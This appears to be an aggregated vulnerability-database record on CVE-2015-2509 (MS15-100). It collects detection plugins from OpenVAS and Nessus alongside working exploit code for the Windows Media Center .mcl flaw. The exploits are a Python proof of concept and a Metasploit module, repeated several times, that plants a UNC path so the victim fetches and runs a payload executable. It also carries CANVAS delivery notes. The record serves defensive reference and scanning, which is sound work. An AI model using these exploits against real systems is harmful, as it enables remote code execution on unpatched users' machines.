"Microsoft Windows Media Center Remote Code Execution Vulnerability (3087918)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Media Center Remote Code Execution Vulnerability (3087918)\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805737\");\n script_version(\"2020-06-09T05:48:43+0000\");\n script_cve_id(\"CVE-2015-2509\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 05:48:43 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-09-09 11:34:04 +0530 (Wed, 09 Sep 2015)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Media Center Remote Code Execution Vulnerability (3087918)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft Bulletin MS15-100.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to an improper handling media\n center link file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code in the context of the current user.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Media Center for\n\n - Microsoft Windows Vista x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows 7 x32/x64 Service Pack 1 and prior\n\n - Microsoft Windows 8 x32/x64\n\n - Microsoft Windows 8.1 x32/x64 Edition\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3087918\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/library/security/MS15-100\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win8:1, win8x64:1, win8_1:1, win8_1x64:1,\n winVista:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\nmedia_center_ver = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\Current\" +\n \"Version\\Media Center\", item:\"Ident\");\n\nif(!media_center_ver){\n exit(0);\n}\n\nehshell_ver = fetch_file_version(sysPath:sysPath, file_name:\"ehome\\Ehshell.dll\");\nif(!ehshell_ver){\n exit(0);\n}\n\nif(hotfix_check_sp(win7:2) > 0)\n{\n if(version_is_less(version:ehshell_ver, test_version:\"6.1.7601.18968\")){\n Vulnerable_range = \"Less Than 6.1.7601.18968\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:ehshell_ver, test_version:\"6.1.7601.22000\", test_version2:\"6.1.7601.23170\"))\n {\n Vulnerable_range = \"6.1.7601.22000 - 6.1.7601.23170\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win8:1, win8x64:1) > 0)\n{\n if(version_is_less(version:ehshell_ver, test_version:\"6.2.9200.17486\"))\n {\n Vulnerable_range = \"Less Than 6.2.9200.17486\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:ehshell_ver, test_version:\"6.2.9200.20000\", test_version2:\"6.2.9200.21600\"))\n {\n Vulnerable_range = \"6.2.9200.20000 - 6.2.9200.21600\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1) > 0)\n{\n if(version_is_less(version:ehshell_ver, test_version:\"6.3.9600.18015\"))\n {\n Vulnerable_range = \"Less Than 6.3.9600.18015\";\n VULN = TRUE ;\n }\n}\n\n## Currently not supporting for Vista 64 bit\nelse if(hotfix_check_sp(winVista:3) > 0)\n{\n if(version_is_less(version:ehshell_ver, test_version:\"6.0.6002.19478\"))\n {\n Vulnerable_range = \"Less Than 6.0.6002.19478\";\n VULN = TRUE ;\n }\n else if (version_in_range(version:ehshell_ver, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.23787\"))\n {\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.23787\";\n VULN = TRUE ;\n }\n}\n\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"ehome\\Ehshell.dll\" + '\\n' +\n 'File version: ' + ehshell_ver + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-04T07:25:55", "description": "Windows Media Center - Command Execution (MS15-100). CVE-2015-2509. Remote exploit for windows platform", "published": "2015-09-11T00:00:00", "type": "exploitdb", "title": "Windows Media Center - Command Execution MS15-100", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2509"], "modified": "2015-09-11T00:00:00", "id": "EDB-ID:38151", "href": "https://www.exploit-db.com/exploits/38151/", "sourceData": "# Title: MS15-100 Windows Media Center Command Execution\r\n# Date : 11/09/2015\r\n# Author: R-73eN\r\n# Software: Windows Media Center\r\n# Tested : Windows 7 Ultimate\r\n# CVE : 2015-2509\r\n\r\n\r\nbanner = \"\"\r\nbanner += \" ___ __ ____ _ _ \\n\" \r\nbanner +=\" |_ _|_ __ / _| ___ / ___| ___ _ __ / \\ | | \\n\"\r\nbanner +=\" | || '_ \\| |_ / _ \\| | _ / _ \\ '_ \\ / _ \\ | | \\n\"\r\nbanner +=\" | || | | | _| (_) | |_| | __/ | | | / ___ \\| |___ \\n\"\r\nbanner +=\" |___|_| |_|_| \\___/ \\____|\\___|_| |_| /_/ \\_\\_____|\\n\\n\"\r\nprint banner\r\n\r\ncommand = \"calc.exe\"\r\nevil = '<application run=\"' + command + '\"/>'\r\nf = open(\"Music.mcl\",\"w\")\r\nf.write(evil)\r\nf.close()\r\nprint \"\\n[+] Music.mcl generated . . . [+]\"", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/38151/"}, {"lastseen": "2016-02-04T07:32:02", "description": "MS15-100 Microsoft Windows Media Center MCL Vulnerability. CVE-2015-2509. Remote exploit for windows platform", "published": "2015-09-15T00:00:00", "type": "exploitdb", "title": "MS15-100 Microsoft Windows Media Center MCL Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2509"], "modified": "2015-09-15T00:00:00", "id": "EDB-ID:38195", "href": "https://www.exploit-db.com/exploits/38195/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::FILEFORMAT\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::Remote::SMB::Server::Share\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS15-100 Microsoft Windows Media Center MCL Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Windows Media Center. By supplying\r\n an UNC path in the *.mcl file, a remote file will be automatically downloaded,\r\n which can result in arbitrary code execution.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'sinn3r',\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-2509'],\r\n ['MSB', 'MS15-100']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'DisablePayloadHandler' => 'false'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n ['Windows', {}],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Sep 8 2015\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']),\r\n OptString.new('FILE_NAME', [ false, 'The name of the malicious payload to execute', 'msf.exe'])\r\n ], self.class)\r\n\r\n deregister_options('FILE_CONTENTS')\r\n end\r\n\r\n def generate_mcl\r\n %Q|<application run=\"#{unc}\" />|\r\n end\r\n\r\n def primer\r\n self.file_contents = generate_payload_exe\r\n print_status(\"Malicious executable at #{unc}...\")\r\n\r\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n mcl = generate_mcl\r\n file_create(mcl)\r\n end\r\n\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/38195/"}], "packetstorm": [{"lastseen": "2016-12-05T22:17:54", "description": "", "published": "2015-09-15T00:00:00", "type": "packetstorm", "title": "MS15-100 Microsoft Windows Media Center MCL Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2509"], "modified": "2015-09-15T00:00:00", "id": "PACKETSTORM:133540", "href": "https://packetstormsecurity.com/files/133540/MS15-100-Microsoft-Windows-Media-Center-MCL-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::SMB::Server::Share \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"MS15-100 Microsoft Windows Media Center MCL Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability in Windows Media Center. By supplying \nan UNC path in the *.mcl file, a remote file will be automatically downloaded, \nwhich can result in arbitrary code execution. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'sinn3r', \n], \n'References' => \n[ \n['CVE', '2015-2509'], \n['MSB', 'MS15-100'] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'DefaultOptions' => \n{ \n'DisablePayloadHandler' => 'false' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['Windows', {}], \n], \n'Privileged' => false, \n'DisclosureDate' => \"Sep 8 2015\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']), \nOptString.new('FILE_NAME', [ false, 'The name of the malicious payload to execute', 'msf.exe']) \n], self.class) \n \nderegister_options('FILE_CONTENTS') \nend \n \ndef generate_mcl \n%Q|<application run=\"#{unc}\" />| \nend \n \ndef primer \nself.file_contents = generate_payload_exe \nprint_status(\"Malicious executable at #{unc}...\") \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nmcl = generate_mcl \nfile_create(mcl) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/133540/ms15_100_mcl_exe.rb.txt"}], "canvas": [{"lastseen": "2019-05-29T19:48:19", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2509"], "edition": 2, "description": "**Name**| ms15_100 \n---|--- \n**CVE**| CVE-2015-2509 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ms15_100 \n**Notes**| References: https://technet.microsoft.com/library/security/ms15-100 \nCVE Name: CVE-2015-2509 \nVENDOR: Microsoft \nNOTES: \nTested on: \nWindows 7 SP1(32 bits) \nWindows 7 SP1(64 bits) \n \nUse port 80 as the server port (Windows requirement related to WebDAV). Also, under \nthe Response tab of ClientD main window, the option \"Respond directly with exploit\" \nmust be selected. \n \nNOTE: Our payload is a MOSDEF trojan. A popup will appear telling the binary \nis not signed. If you don't want the popup to appear use a signed payload. \n \nDate public: 08/09/2015 \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2509 \nCVSS: 9.3 \n\n", "modified": "2015-09-09T00:59:00", "published": "2015-09-09T00:59:00", "id": "MS15_100", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms15_100", "type": "canvas", "title": "Immunity Canvas: MS15_100", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-02-01T06:15:11", "description": "The remote Windows host is affected by a remote code execution\nvulnerability due to a use-after-free error in Microsoft Windows Media\nCenter when handling specially crafted Media Center link (.mcl) files.\nA remote attacker can exploit this vulnerability by convincing a user\nto install a malicious link file, resulting in the execution of\narbitrary code in the context of the current user.", "edition": 29, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2015-09-10T00:00:00", "title": "MS15-100: Vulnerability in Windows Media Center Could Allow Remote Code Execution (3087918)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2509"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS15-100.NASL", "href": "https://www.tenable.com/plugins/nessus/85884", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85884);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2015-2509\");\n script_bugtraq_id(76594);\n script_xref(name:\"MSFT\", value:\"MS15-100\");\n script_xref(name:\"MSKB\", value:\"3087918\");\n\n script_name(english:\"MS15-100: Vulnerability in Windows Media Center Could Allow Remote Code Execution (3087918)\");\n script_summary(english:\"Checks the version of ehshell.dll.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by a remote code execution\nvulnerability due to a use-after-free error in Microsoft Windows Media\nCenter when handling specially crafted Media Center link (.mcl) files.\nA remote attacker can exploit this vulnerability by convincing a user\nto install a malicious link file, resulting in the execution of\narbitrary code in the context of the current user.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2015/ms15-100\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 7, 8, and\n8.1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS15-100 Microsoft Windows Media Center MCL Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\nbulletin = 'MS15-100';\nkb = '3087918';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nvuln = 0;\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\nwin_media_center_installed = get_registry_value(handle:hklm, item:\"SOFTWARE\\Clients\\Media\\Windows Media Center\\\");\nif(win_media_center_installed == \"Windows Media Center\")\n win_media_center_installed = TRUE;\nelse win_media_center_installed = FALSE;\nRegCloseKey(handle:hklm);\nclose_registry();\n\nif(!win_media_center_installed)\n audit(AUDIT_NOT_INST, \"Windows Media Center\");\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"msil_ehshell_31bf3856ad364e35_\", file_pat:\"^ehshell\\.dll$\", max_recurse:1);\n\n# Vista\n# File Only Exists of Media Center TV Pack is installed (which comes installed by OEM)\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19478','6.0.6002.23788'),\n max_versions:make_list('6.0.6002.20000','6.0.6002.99999'),\n bulletin:bulletin,\n kb:kb);\n\n# Windows 7\nvuln += hotfix_check_winsxs(os:'6.1',\n sp:1,\n files:files,\n versions:make_list('6.1.7600.17545', '6.1.7601.18968', '6.1.7601.23171'),\n max_versions:make_list('6.1.7600.20000', '6.1.7601.20000', '6.1.7601.99999'),\n bulletin:bulletin,\n kb:kb);\n# Windows 8\nvuln += hotfix_check_winsxs(os:'6.2',\n sp:0,\n files:files,\n versions:make_list('6.2.9200.17486', '6.2.9200.21601'),\n max_versions:make_list('6.2.9200.20000', '6.2.9200.99999'),\n bulletin:bulletin,\n kb:kb);\n\n# Windows 8.1\n# Only Vulnerable if Windows Media Center ($10 add-on) is installed\nvuln += hotfix_check_winsxs(os:'6.3',\n sp:0,\n files:files,\n versions:make_list('6.3.9600.18015'),\n max_versions:make_list('6.3.9600.99999'),\n bulletin:bulletin,\n kb:kb);\n\n# cleanup\nNetUseDel();\n\nif (vuln)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-07T21:59:37", "description": "This module exploits a vulnerability in Windows Media Center. By supplying an UNC path in the *.mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution.\n", "published": "2015-09-11T20:05:06", "type": "metasploit", "title": "MS15-100 Microsoft Windows Media Center MCL Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2509"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/MS15_100_MCL_EXE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::SMB::Server::Share\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS15-100 Microsoft Windows Media Center MCL Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability in Windows Media Center. By supplying\n an UNC path in the *.mcl file, a remote file will be automatically downloaded,\n which can result in arbitrary code execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'sinn3r',\n ],\n 'References' =>\n [\n ['CVE', '2015-2509'],\n ['MSB', 'MS15-100']\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'DisablePayloadHandler' => false\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows', {}],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2015-09-08',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']),\n OptString.new('FILE_NAME', [ false, 'The name of the malicious payload to execute', 'msf.exe'])\n ])\n\n deregister_options('FILE_CONTENTS')\n end\n\n def generate_mcl\n %Q|<application run=\"#{unc}\" />|\n end\n\n def primer\n self.file_contents = generate_payload_exe\n print_status(\"Malicious executable at #{unc}...\")\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n mcl = generate_mcl\n file_create(mcl)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-2514", "CVE-2015-2485", "CVE-2015-2498", "CVE-2015-2508", "CVE-2015-2513", "CVE-2015-2486", "CVE-2015-2491", "CVE-2015-2528", "CVE-2015-2506", "CVE-2015-2525", "CVE-2015-2487", "CVE-2015-2516", "CVE-2015-2501", "CVE-2015-2507", "CVE-2015-2524", "CVE-2015-2494", "CVE-2015-2541", "CVE-2015-2509", "CVE-2015-2530", "CVE-2015-2492", "CVE-2015-2510", "CVE-2015-2502", "CVE-2015-2490", "CVE-2015-2519", "CVE-2015-2484", "CVE-2015-2504", "CVE-2015-2500", "CVE-2015-2483", "CVE-2015-2499", "CVE-2015-2534", "CVE-2015-2526", "CVE-2015-2542", "CVE-2015-2489", "CVE-2015-2511", "CVE-2015-2493"], "description": "Multiple vulnerabilities in Edge and Internet Explorer, code execution in graphics and journaling, mediascenter, .Net framework, task management, Active Directory, Hyper-V.", "edition": 1, "modified": "2015-09-15T00:00:00", "published": "2015-09-15T00:00:00", "id": "SECURITYVULNS:VULN:14689", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14689", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}